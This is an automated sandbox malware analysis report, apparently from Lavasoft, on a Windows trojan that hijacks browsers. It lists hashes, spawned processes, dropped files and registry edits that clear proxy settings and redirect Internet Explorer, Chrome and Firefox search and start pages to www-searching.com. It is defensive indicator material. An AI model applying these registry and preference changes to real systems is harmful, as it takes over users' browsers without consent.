Thu, 03/30/2017 - 12:10

Gen.Variant.Kazy.746779_16f4b6f13e

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.746779 (B) (Emsisoft), Gen:Variant.Kazy.746779 (AdAware), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)

Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 16f4b6f13e3e20e37edf9403c894fe80

SHA1: 73429446915087ec7b4ae2cc5a68f13f9d3c0150

SHA256: 294883e4d17afba42cfd8dddbbbdca386d1ce67e25bd743e75deb07fb4c592f9

SSDeep: 24576:qTJMjonewo QkE3pGq/g8LaGCCmH/u pvFfU jEBbTr/:YeDwoFk0pfLPCCmH/dlFxEBbTr/

Size: 1085952 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2015-10-10 06:19:11

Analyzed on: Windows7 SP1 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

smu.exe:2540
smu.exe:3356
sma.exe:308
sma.exe:4008
sma.exe:3164
sma.exe:3192
%original file name%.exe:3380
%original file name%.exe:264
smp.exe:3444
smp.exe:2836
tcpsvcs.exe:3488
tcpsvcs.exe:1504

The Trojan injects its code into the following process(es): No processes have been created.

Mutexes

The following mutexes were created/opened: No objects were found.

File activity

The process smu.exe:2540 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)

The process smu.exe:3356 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\Pre83CF.tmp (601 bytes)
C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
C:\Windows\Temp\Pre93AB.tmp (601 bytes)
C:\Windows\Temp\Web93AC.tmp (63 bytes)
C:\Windows\Temp\Pre83E0.tmp (601 bytes)
C:\Windows\Temp\Web83D0.tmp (63 bytes)
C:\Windows\Temp\Web83E1.tmp (63 bytes)

The Trojan deletes the following file(s):

C:\Windows\Temp\Pre93AB.tmp (0 bytes)
C:\Windows\Temp\Pre83CF.tmp (0 bytes)
C:\Windows\Temp\Pre83E0.tmp (0 bytes)

The process %original file name%.exe:3380 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_13704\%original file name%.exe (7433 bytes)

The process %original file name%.exe:264 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Installytd_6828\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll (1192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_9822\%original file name%.exe (7433 bytes)

The process smp.exe:3444 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)

The process smp.exe:2836 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (1 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Search.lnk (1 bytes)

The process tcpsvcs.exe:3488 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\search-metadata.json (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (11028 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\searchplugins\smod.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (9416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (388 bytes)

The process tcpsvcs.exe:1504 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (7392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (12 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF8.tmp (245963 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smp.exe (6584 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EFA.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsc6EE8.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (0 bytes)

Registry activity

The process smu.exe:2540 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "40 CB 63 41 C7 74 17 84 EA 5E F9 24 AE E1 DA 8A"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Wow6432Node\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Spt" = "1B 39 48 C8 E0 BD 90 00 51 86 E1 DD 14 43 97 BC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Gcf" = "80 46 55 E5 90 D4 4A C0 31 0A 29 D6 59 11 73 09"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\smu_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus\Users\Default]
"Ucf" = "AF 19 06 18 24 A7 78 A7 83 2B E1 77 84 81 A9 3B"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process smu.exe:3356 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Rlt" = "Type: REG_QWORD, Length: 8"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Scf" = "46 A0 C0 5B 56 BA 84 71 70 9D 4F 8D 92 7C EE 47"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 03 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\SearchModulePlus\SMUpdPlus]
"Ult" = "Type: REG_QWORD, Length: 8"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:308 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sma_RASAPI32]
"FileTracingMask" = "4294901760"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:4008 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:3164 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sma.exe:3192 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:3380 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{E549E976-C5F2-4E77-819D-55BC9B7C25BC}"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\16f4b6f13e3e20e37edf9403c894fe80_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:264 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\SearchModulePlus\Success]
"Install" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\SearchModulePlus\Success]
"InstallStr" = "ok"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process smp.exe:3444 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process smp.exe:2836 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesVersion" = "2"
"Favorites" = "00 7C 01 00 00 14 00 1F 80 C8 27 34 1F 10 5C 10"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"@zipfldr.dll,-10148" = "Compressed (zipped) folder"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesChanges" = "9"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32]
"FXSRESM.dll,-120" = "Fax recipient"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband]
"FavoritesResolve" = "CC 02 00 00 4C 00 00 00 01 14 02 00 00 00 00 00"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
"@sendmail.dll,-21" = "Desktop (create shortcut)"
"@sendmail.dll,-4" = "Mail recipient"

The process tcpsvcs.exe:3488 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"
"URL" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"(Default)" = "Type: REG_SZ, Length: 0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURLFallback" = "http://www-searching.com/search.aspx?s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&site=shyosie&prd=set&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"SuggestionsURLFallback" = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE8SSC&market={language}"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"DisplayName" = "Search Module"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"DisplayName" = "Bing"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"URL" = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"SuggestionsURLFallback" = "http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{034127AD-1C9F-4882-9EA1-FA0972B48B08}]
"TopResultURLFallback" = "http://www.bing.com/search?q={searchTerms}&src=ie9tr"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www-searching.com/?pid=s&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507&vp=ch&prd=set"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www-searching.com/favicon.ico"
